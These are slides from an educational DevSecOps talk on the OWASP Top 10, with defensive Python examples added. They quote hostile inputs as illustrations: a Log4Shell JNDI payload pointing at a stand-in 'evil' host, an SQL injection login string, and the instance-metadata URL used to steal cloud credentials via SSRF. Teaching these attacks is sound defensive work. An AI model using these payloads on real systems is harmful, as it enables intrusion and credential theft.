
We all are

DevSecOps

Marcin Łapaj

28.11.2023
…

The problem of viruses is temporary
and will be solved in two years.
John McAfee, 1988

… our code is secure.
What about …

… frameworks
… libraries
… runtime
… container

Vulnerabilities are discovered every day in …

… libraries
… runtimes
… containers

… and attackers don't take excuses


Open Worldwide Application Security Project
nonprofit foundation that works to improve the security of software

Tools | Resources | Education | Networking

OWASP Top 10 | Proactive Controls | ASVS | Dependency Track
more … https://owasp.org/projects/
Security in Software Development Lifecycle

Requirements Definition → Design → Development → Testing → Deployment → Maintain

Security Review, Pen Tests
OWASP Top 10 Web Application Security Risks

A01: Broken Access Control
A02: Cryptographic Failures
A03: Injection
A04: Insecure Design
A05: Security Misconfiguration
A06: Vulnerable and Outdated Components
A07: Identification and Authentication Failures
A08: Software and Data Integrity Failures
A09: Security Logging and Monitoring Failures
A10: Server-Side Request Forgery (SSRF)
… top 10 … CWE … CVE

OWASP Top 10: the most critical security risks in web applications. Broad risk categories that can contain multiple CWEs, ordered by criticality.

CWE (Common Weakness Enumeration): enumerated types of software weakness.
e.g. CWE-20 Improper Input Validation, CWE-400 Uncontrolled Resource Consumption, CWE-502 Deserialization of Untrusted Data

CVE (Common Vulnerabilities and Exposures): enumerated instances of software vulnerability.
e.g. CVE-2021-44228 (Log4Shell)
A04
Insecure Design

CWE-522: Insufficiently Protected Credentials

CWE-501: Trust Boundary Violation

CWE-209: Generation of Error Message Containing Sensitive Information

Insecure Design

Difference between insecure design and insecure implementation

implementation bug vs. design flaw

A secure design can still have implementation defects,
an insecure design cannot be fixed by a perfect implementation.

Insecure Design
example

Password Reset

Questions & Answers

What is your dog's name?
What is your mother's maiden name?

These can be found e.g. on social media …
Insecure Design
example

Adobe 2013 Password Leak

Play Crosswords! Encrypted passwords were stored next to the users' password hints:

BrxFWywGE4c=
horse | mythical | one horned horse | the usual

Identical passwords produced identical ciphertext, so the hints of everyone sharing a ciphertext give the password away.

Insecure Design
prevention

Involve security in architecture
Security by design
Use security patterns

Perform designated threat modeling to challenge the design
Identify trust boundaries
Identify threats
Derive countermeasures to improve the design

Establish a secure development lifecycle (SDLC)

A05
Security Misconfiguration

CWE-16 Configuration

CWE-611 Improper Restriction of XML External Entity Reference

CWE-1004 Sensitive Cookie Without 'HttpOnly' Flag

Security misconfiguration

Working vs Configured Properly
Security misconfiguration
example

Open S3 bucket
Default credentials
Monitoring endpoint that reveals lots of information
Unnecessary open ports
Disabled security features
Security misconfiguration
example

used misconfigured S3 buckets

100 US cities using the same product, mapsonline.net
86 misconfigured Amazon S3 buckets
1000 GB of data
1.6 million files
A06
Vulnerable and Outdated Components

CWE-1035: Using Components with known vulnerabilities

CWE-1104: Use of Unmaintained Third-Party Components


Vulnerable and Outdated Components

Vulnerabilities go public and are ready to use

https://www.exploit-db.com/
Log4Shell
JNDI Attack

Resulted in a critical remote code execution vulnerability in lots of Java applications

Even made it to general news

Diagram: the Log4J logger expands lookups of the form ${prefix:name}; a logged payload such as ${jndi:ldap://evil:1389/Exploit} makes the logger fetch and load Evil.class from the attacker's server.
Vulnerable and Outdated Components
example

129,000 customers, as well as financial information of its former employee

Accellion FTA, a 20-year-old file sharing platform that was EOL

Vulnerable and Outdated Components
scan for vulnerabilities

DependencyTrack

Development → Testing → Deployment → Maintain
A01
Broken Access Control

CWE-284: Improper Access Control

CWE-200: Exposure of Sensitive Information to an Unauthorized Actor

CWE-201: Exposure of Sensitive Information Through Sent Data

CWE-352: Cross-Site Request Forgery


Insecure Direct Object References

https://mybank.com/account/1001

https://mybank.com/account/3005

Manipulate the object reference and execute an HTTP request

Insecure Direct Object References
example
A02
Cryptographic Failures

CWE-327: Broken or Risky Crypto Algorithm

CWE-331 Insufficient Entropy

CWE-319 Cleartext Transmission of Sensitive Information

Cryptographic Failures
example

data transmitted in plain text

old or weak cryptography, deprecated hash functions such as MD5 or SHA1

credentials stored without salting

Cryptographic Failures
example

use strong standard cryptography - do not invent your own

encrypt all data in transit - HTTPS

encrypt all sensitive data at rest

Cryptographic Failures
example

database uses unsalted or simple hashes

attacker retrieves the password database

a rainbow table is used to reverse the unsalted hashes

a salted hash generated with a simple (fast) function can still be cracked
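The contrast drawn on the last three slides, as an added Python example (not from the talk): an unsalted fast hash lets identical passwords be spotted across a leaked table, the "crossword" of the Adobe slide, while a per-user salt and a slow KDF (PBKDF2-HMAC-SHA256 here) do not. The user list and passwords are constructed.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Set

# Constructed sample users; alice and bob happen to share a password.
USERS = {"alice": "unicorn", "bob": "unicorn", "carol": "Tr0ub4dor&3"}
ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor (OWASP cheat sheet value)

def weak_hash(password: str) -> str:
    """Unsalted MD5, the pattern the slides warn about: equal passwords give
    equal digests, so one cracked entry or one hint exposes every user."""
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Per-user random salt plus a deliberately slow KDF. The record is
    self-describing so parameters can be raised later without a migration."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"

def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = record.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
    except ValueError:  # malformed record
        return False
    return hmac.compare_digest(digest.hex(), digest_hex)

def duplicate_groups(stored: Dict[str, str]) -> List[Set[str]]:
    """Users whose stored value is identical: the 'crossword' an attacker
    plays on an unsalted dump. With salted hashes this list is empty."""
    by_value: Dict[str, Set[str]] = {}
    for user, value in stored.items():
        by_value.setdefault(value, set()).add(user)
    return [users for users in by_value.values() if len(users) > 1]

if __name__ == "__main__":
    print("unsalted MD5 collisions:", duplicate_groups({u: weak_hash(p) for u, p in USERS.items()}))
    print("salted PBKDF2 collisions:", duplicate_groups({u: hash_password(p) for u, p in USERS.items()}))
```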


Cryptographic Failures
SOPS

Diagram: config.yaml is encrypted with Mozilla SOPS; the encrypted config.yaml is what gets committed and pulled, and at deployment it is decrypted with the private key.
A03
Injection

CWE-89: SQL Injection,

CWE-79: Cross-site Scripting


Injection
tricking the application

Malicious Input → Interpreter → Execution

SQL injection
some SQL query

expected happy path

deactivate for known user … try a random user

SQL injection
example

admin' #
A07
Identi cation and Authentication Failures

CWE-521: Weak Password Requirements

CWE-287: Improper Authentication

CWE-384: Session Fixation

CWE-288: Authentication Bypass Using an Alternate Path or Channel


fi
Identi cation and Authentication Failures
prevention

Use multi factor authentication


No default credentials
Limit or delay failed login attempts
Password length, complexity, and rotation policies
Generic error messages
(not "wrong password" when user exists)
fi
A08
Software and Data Integrity Failures

CWE-829: Inclusion of Functionality from Untrusted Control Sphere

CWE-502: Deserialization of Untrusted Data

CWE-494: Download of Code Without Integrity Check

Software and Data Integrity Failures
example

SolarWinds "Orion" IT monitoring system has privileged access to IT systems to gain logs and data

Hackers inserted malicious code into Orion

SolarWinds unwittingly sent out software updates with the malicious code

affected over 100 companies

Through this code, hackers installed even more malware

Software and Data Integrity Failures
prevention

Verify downloaded packages (checksums)

Consume trusted repositories

Verify components for vulnerabilities
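One way to act on "Verify downloaded packages (checksums)", as an added Python example (not the talk's code): verify every downloaded artefact against a sha256sum-style manifest and refuse to proceed on a mismatch, a missing file, or a file the manifest does not list. File names, contents and the manifest are constructed.

```python
import hashlib
import hmac
from typing import Dict

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

# Constructed "downloads" standing in for packages fetched by the build.
FILES: Dict[str, bytes] = {
    "tool-1.2.0.tar.gz": b"pretend tarball bytes",
    "tool-1.2.0.sig": b"pretend signature bytes",
}
# Constructed manifest in sha256sum format ('<hex>  <name>'): the .sig line is
# deliberately wrong and the docs archive is listed but was never downloaded.
MANIFEST = (f"{sha256_hex(FILES['tool-1.2.0.tar.gz'])}  tool-1.2.0.tar.gz\n"
            f"{'0' * 64}  tool-1.2.0.sig\n"
            f"{'a' * 64}  tool-1.2.0-docs.zip\n")

def parse_manifest(text: str) -> Dict[str, str]:
    """Map file name -> expected digest; a leading '*' (binary mode) is dropped.
    A malformed line is an error, never something to skip silently."""
    expected: Dict[str, str] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.strip().lstrip("*")
        if len(digest) != 64 or not name or any(
                c not in "0123456789abcdef" for c in digest.lower()):
            raise ValueError(f"malformed manifest line: {line!r}")
        expected[name] = digest.lower()
    return expected

def verify_downloads(manifest: str, files: Dict[str, bytes]) -> Dict[str, str]:
    """Per-file verdict: 'ok', 'MISMATCH', 'UNLISTED' (downloaded but not in
    the manifest) or 'MISSING' (in the manifest but not downloaded)."""
    expected = parse_manifest(manifest)
    verdict: Dict[str, str] = {}
    for name, data in files.items():
        if name not in expected:
            verdict[name] = "UNLISTED"
        elif hmac.compare_digest(sha256_hex(data), expected[name]):
            verdict[name] = "ok"
        else:
            verdict[name] = "MISMATCH"
    for name in expected.keys() - files.keys():
        verdict[name] = "MISSING"
    return verdict

def all_ok(verdict: Dict[str, str]) -> bool:
    """The build may proceed only when every file verified."""
    return bool(verdict) and all(v == "ok" for v in verdict.values())
```

A manifest served next to the download only catches corruption and tampering in transit; it cannot catch a compromised build pipeline like the Orion case, where the malicious updates were legitimately signed, so pair it with signature verification and the vulnerability scanning the slide also lists.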


A10
Server-Side Request Forgery (SSRF)

CWE-918 Server-Side Request Forgery (SSRF)


Server-Side Request Forgery (SSRF)

Diagram: an HTTP request passes the WAF and reaches the webapp; through SSRF the webapp fetches content from a service in the internal infrastructure and hands it back in the response.

Server-Side Request Forgery (SSRF)
example

100 million individuals in the US
6 million in Canada
Social Security numbers
Bank account numbers

Diagram (AWS VPC, the 2019 Capital One breach): an SSRF through the WAF reached the EC2 instance metadata endpoint 169.254.169.254:
http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
The returned ISRM-WAF-Role credentials were then used to list buckets and access S3.
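A defensive check for the "fetch this URL" feature that SSRF abuses, as an added Python example (not from the talk): before the webapp makes an outbound request, refuse any target that resolves to loopback, private or link-local space, which covers the 169.254.169.254 metadata endpoint from the slide. The injectable resolver and the host names in the test are assumptions so the check runs offline.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Optional, Set
from urllib.parse import urlsplit

Resolver = Callable[[str], Set[str]]

def system_resolver(host: str) -> Set[str]:
    """Every A/AAAA answer from the OS resolver; IP literals pass through."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_internal(ip: str) -> bool:
    """Addresses that point back into the deployment: loopback, RFC 1918,
    link-local (which contains the 169.254.169.254 metadata endpoint), etc."""
    addr = ipaddress.ip_address(ip.split("%")[0])  # drop an IPv6 scope id
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata IP
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_multicast or addr.is_unspecified)

def is_safe_outbound_url(url: str, allowed_hosts: Optional[Iterable[str]] = None,
                         resolve: Resolver = system_resolver) -> bool:
    """Allow only http(s), only hosts on the allow-list when one is given, and
    only when *every* resolved address is public. Any doubt means reject."""
    parts = urlsplit(url)
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return False
    if allowed_hosts is not None and host.lower() not in {h.lower() for h in allowed_hosts}:
        return False
    try:
        addresses = resolve(host)
        return bool(addresses) and not any(is_internal(ip) for ip in addresses)
    except (socket.gaierror, UnicodeError, ValueError):
        return False
```

Connect to the address you validated (or re-check inside the HTTP client after its own DNS lookup) and re-run the check on every redirect, otherwise DNS rebinding or a 302 to the metadata address bypasses it; on AWS, IMDSv2 with a hop limit of 1 removes the easy credential grab independently of this check.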


A09
Security Logging and Monitoring Failures

CWE-778 Insufficient Logging

CWE-117 Improper Output Neutralization for Logs

CWE-532 Insertion of Sensitive Information into Log File

Security Logging and Monitoring Failures
example

RevealStackTrace

Security Logging and Monitoring Failures
prevention

Identifying security incidents
Monitoring policy violations
do not log sensitive information
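The three prevention items together, as an added Python example (not the talk's code): a log writer that redacts sensitive fields (CWE-532) and neutralizes line breaks and quotes so user input cannot forge an extra entry (CWE-117), plus a monitor that flags source IPs with repeated failed logins. Field names, the threshold and the events are constructed.

```python
import re
from collections import Counter
from typing import Dict, List

SENSITIVE_KEYS = {"password", "passwd", "secret", "token", "authorization", "ssn"}

def neutralize(value: str, max_len: int = 200) -> str:
    """CWE-117: escape backslashes, CR/LF and quotes, replace other control
    characters, and cap length, so input cannot forge a second log entry."""
    value = (value.replace("\\", "\\\\").replace("\r", "\\r")
                  .replace("\n", "\\n").replace('"', '\\"'))
    return "".join(ch if ch.isprintable() else "?" for ch in value)[:max_len]

def format_event(event: str, **fields) -> str:
    """One line per event, key="value" pairs; sensitive keys are redacted."""
    parts = [f"event={event}"]
    for key in sorted(fields):
        shown = "[REDACTED]" if key.lower() in SENSITIVE_KEYS else str(fields[key])
        parts.append(f'{key}="{neutralize(shown)}"')
    return " ".join(parts)

FIELD_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')

def parse_event(line: str) -> Dict[str, str]:
    """Inverse of format_event for the monitor; escaped quotes stay inside."""
    event, _, rest = line.partition(" ")
    fields = {m.group(1): m.group(2) for m in FIELD_RE.finditer(rest)}
    fields["event"] = event.split("=", 1)[1]
    return fields

def failed_login_sources(lines: List[str], threshold: int = 5) -> Dict[str, int]:
    """Monitoring: source IPs with at least `threshold` failed logins."""
    counts: Counter = Counter()
    for line in lines:
        fields = parse_event(line)
        if fields["event"] == "login_failed":
            counts[fields.get("ip", "?")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}
```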
Thank you!

Rate my talk in the Eventory app